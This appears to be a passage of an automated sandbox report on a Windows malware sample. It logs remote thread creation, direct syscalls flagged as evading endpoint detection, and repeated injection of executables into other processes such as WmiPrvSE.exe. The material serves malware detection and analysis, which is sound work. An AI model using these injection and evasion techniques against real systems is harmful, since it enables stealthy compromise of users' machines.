            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 405C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 825C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 95C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 5D5C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 95C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 915C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 395C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 95C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 225C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 155C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 7F5C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 255C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 265C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 3F5C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 3F5C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 285C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 105C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 265C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 5D5C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 1C5C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 235C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 95C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 255C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 105C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 2A5C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 275C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 2B5C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 95C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 2D5C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 155C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 755C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 125C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 555C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 255C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 2E5C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 395C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 1B5C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 105C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 385C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 825C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 385C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 3E5C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 285C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 5F5C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 2B5C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 8A5C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 105C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 1D5C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 185C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 1C5C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 8E5C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 415C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 145C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 3A5C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 165C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 145C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 195C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 105C50Jump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeNtQueryInformationProcess: Direct from: 0x774CFAFA
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeNtQuerySystemInformation: Direct from: 0x774D20DE
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeNtClose: Direct from: 0x774CFA02
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeNtSetTimer: Direct from: 0x774D021A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeNtOpenFile: Direct from: 0x774CFD86
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeNtSetInformationThread: Direct from: 0x774E9893Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeNtCreateMutant: Direct from: 0x774D07BE
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeNtOpenKeyEx: Direct from: 0x774CFA4A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeNtAllocateVirtualMemory: Direct from: 0x774CFAE2
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeNtResumeThread: Direct from: 0x774D008D
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeNtOpenKeyEx: Direct from: 0x774D103A
            Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeNtUnmapViewOfSection: Direct from: 0x774CFCA2Jump to behavior
            Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeNtDelayExecution: Direct from: 0x774CFDA1Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeNtSetInformationProcess: Direct from: 0x774CFB4A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeNtAdjustPrivilegesToken: Direct from: 0x774CFEE2
            Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeNtSetInformationThread: Direct from: 0x774CF9CEJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeNtMapViewOfSection: Direct from: 0x774CFC72
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeNtCreateThreadEx: Direct from: 0x774D08C6
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeNtDeviceIoControlFile: Direct from: 0x774CF931
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeNtQueryValueKey: Direct from: 0x774CFACA
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeNtTerminateThread: Direct from: 0x774D00A6
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeNtOpenSection: Direct from: 0x774CFDEA
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeNtProtectVirtualMemory: Direct from: 0x774D005A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeNtSetInformationThread: Direct from: 0x774CFF12
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeNtWriteVirtualMemory: Direct from: 0x774CFE36
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeNtQueryAttributesFile: Direct from: 0x774CFE7E
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeNtReadVirtualMemory: Direct from: 0x774CFEB2
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeNtSetTimer: Direct from: 0x774E98D5Jump to behavior
            Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeNtTerminateProcess: Direct from: 0x774CFCD2Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeNtQuerySystemInformation: Direct from: 0x774CFDD2
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Users\user\Desktop\25F.tmp.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Users\user\Desktop\25F.tmp.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: C50000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3D0000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 380000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 410000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1B0000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 350000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 310000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 380000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 220000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 320000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 510000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 190000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 840000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 820000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 5D0000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 910000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 390000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 220000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 150000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 7F0000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 250000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 260000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3F0000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3F0000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 280000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 260000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 5D0000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1C0000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 230000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 250000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2A0000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 270000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2B0000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2D0000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 150000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 750000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 120000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 550000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 250000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2E0000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 390000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1B0000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 380000 value starts with: 4D5AJump to behavior
